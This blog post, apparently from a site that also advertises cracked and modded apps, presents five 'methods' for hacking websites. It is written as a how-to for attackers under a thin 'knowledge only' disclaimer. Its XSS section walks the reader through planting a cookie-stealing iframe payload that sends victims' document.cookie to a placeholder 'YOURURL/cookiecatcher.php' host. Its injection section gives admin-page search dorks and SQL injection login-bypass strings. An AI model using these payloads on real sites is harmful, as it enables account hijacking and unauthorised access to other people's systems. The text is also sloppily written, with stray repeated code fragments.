- 5paisa
- AdSense
- Android
- Asphalt 8 : Airborne Mod Apk 4.9.1b Unlimited Money
- Battlegrounds Mobile India
- Blogger
- Blogging
- Bug Hunting
- cloud storage
- Cmd
- Damn vulnerable Web Application
- Demat Account
- Difference between
- dj alok
- dj alok in free firefree
- Doodle Army 2 : Mini Militia 5.2.0 Apk + Mod for android
- DVMA
- E-books
- earn Bitcoins
- Ethical hacking tutorials
- Express vpn
- EXPRESSVPN PRO APK 7.12.1
- EXPRESVPN CRACKED APK
- fire dj alok
- Freefire
- Gaming
- Google drive
- Google llc
- gplink
- Groww App
- Health
- helo
- helo mela
- helo app
- Helo app earn paytm
- Helo app full guide
- Helo app invite and earn
- Helo app redeem proof
- Helo app refer and earn
- Helo app unlimited trick
- Helo app withdraw proof
- Helo Mela Offer: Get Rs.2 Free Paytm Cash + Win Upto Rs.10000 Paytm Cash
- helo refer and earn
- How to
- How to combine two Wifi Connections to get a faster Internet
- how to get dj alok for free
- how to get free dj alok
- how to get free dj alok in free fire
- How to install DVWA on Kali Linux 2020.2
- How To Use Light Speed WebCache on Your website
- ICICI Direct
- IOS
- kali linux
- Live streaming
- makeup
- meesho
- Money Earning
- My poems
- Netflix
- Netflix mod
- Netflix premium
- News
- online courses
- Pentesting
- programming
- PUBG
- Puffin Browser Pro 8.3.0.41446 (Full) Apk + Mod for Android
- Puzzles
- Recharge offers
- Refer and Earn
- Reviews
- SEO
- shell Scripting
- Shortlink
- Spotify Music 8.5.57.1164 APK Mega Mod Cracked Latest Android
- stylish name
- Technology
- Tips&Tricks
- Township Mod Apk 7.5.0 Unlimited Money
- Udemy
- Udemy courses
- Udemy free
- Udemy premium
- VClip app download link
- VClip app full details
- VClip app invitation link
- VClip app referral code
- VClip app referral link
- VClip app review
- Web designing
- What is
- WINDOWS
- Wishes
- Wordpress
- World Cricket Championship 2 2.8.9 Apk + Mod (Coins/Unlocked)
- Youtube tricks
- zoom app
- zoom bombing
- zoom call
- Zoom safety tips
Best Possible Ways That Hackers Used To Hack Websites
Best Possible Ways That Hackers Used To Hack Websites - Kumar Jeeru
Websites are not secure and hackers can hack website with the many methods for hacking websites using website hacking and vulnerability finding tools 2016. So its important to secure your website if you have to protect from hackers. See the ways below which hackers can use to hack websites.
Note:- Article is only for knowledge and research purpose, do not use it in any illegal way, I'm not responsible for anything happen.
Method 1: Using Cross Site Scripting
Step 1:- First step to be followed i to find a vulnerable site where yo can post your text. if the site is secure then this will not work.window.alert(“test”)window.alert(“test”)window.alert(“test”)
Step 2:- Now create a post and write some special code into the “post”
which will capture the data of all who click on it. Test the system if
it filters out code. Post
<script>window.alert(“test”)</script>.
If an alert box appears in front of you then the site is vulnerable to attack.
Step 3:- Create and upload your cookie catcher.
The main idea to create this is to capture a user’s cookie which helps in accessing to their account for websites with vulnerable logins. For this, you need a cookie catcher which will capture your target’s cookies and divert them. Upload the catcher to a website you have accessed to and that supports php too.
Step 4:- Post with your cookie catcher.
Input the code into the post which will capture the cookies and sent
them to your site too. You wish to put in some text after the code to
reduce suspicion and keep it away from deleting.
An example code would look like
<iframe frameborder=”0″ height=”0″ width=”0″
src=”javascript…:void(document.location=’YOURURL/cookiecatcher.php?c=’
document.cookie)></iframe>
Method 2: Executing Injection Attacks
Step 1:- You need to find a vulnerable site due to an easily accessible admin login.Try searching it. (inurl:admin/login.php, inurl:admin/adminlogin.php)
Step 2:- Now, Login as an admin. Type admin as the username and use one of
a number of different strings as the password. Take a example:
1’or’1’=’1.It will take few seconds. OR username = n'or's'='s password = n'or's'='s (same username password).
Step 3:- Access the website. You will be able to find a string that
allows you admin access to a website assuming the site is vulnerable to
attack.
Method 3: Setting Up For Success
Step 1:- If you really want to learn how to hack websites you must know one or two languages like Python or SQL and how computers and technologies work for the better control of computers and to find vulnerabilities in system.
Step 2:- You must be familiar about HTML literacy and Java Script to hack websites in particular.
Step 3:- You must consult with white-hats. These are the hackers who use their powers for good, exposing security vulnerabilities. If you want to hack websites and protect your own site, must contact with the white-hats.
Step 4:- Research hacking. To protect your own site or to learn hacking, you must be trained in field of researching. There are many was and list keeps on changing.
Sep 5:- Keep up to date. As the list keeps on changing , you must be sure that you are up to date. If you are protected from certain types of hack then only you are safe in future.
Method 4: ClickJacking Attacks
ClickJacking is also called a UI Redress Attack . It is this when a hacker uses multiple opaque layers to trick a user into clicking the top layer without knowing them. The attacker is “hijacking” that is not meant for the actual page loaded but for a page where the attacker wants you to be. Let us take an example i.e using a carefully crafted combinations of stylesheets,iframes and text boxes. By this a user can led to believe they are typing in the password for bank account but they are writing into an invisible space that is controlled by the attacker which is not visible to the user.
Method 5: SYMLINKING
A symlink is a special file that “points to” a hard link on a mounted
file system. A symlinking attack occurs when a hacker places the
symlink in such a way that the user access the endpoint thinks they are
accessing the correct file.
If the endpoint file is an output, the consequence of the symlink attack
is that it can be easily modified alternatively of the file at the
deliberate location. Modifications include like appending,
overwriting,corrupting or even changing permissions.
In various situations, hacker may be able to control the changes to a file, grant themselves approach access, insert wrong information, reveal sensitive information or destroy vital system or files or applications. And therefore better is to secure your websites.
Hope you loved this post feel free to comment your doubts here
KumarJeeru
Also Read
KUMAR JEERU
. I am a Programmer and Pentester. I find and Fix loophole in websites and networks. Connect with me for queries , web developemnt , Scanning and Fixing website Security issues. My company gives special discount for independent entrepreneur , small and Medium size companies. Contact me directly on my face page
Post a Comment
Post a Comment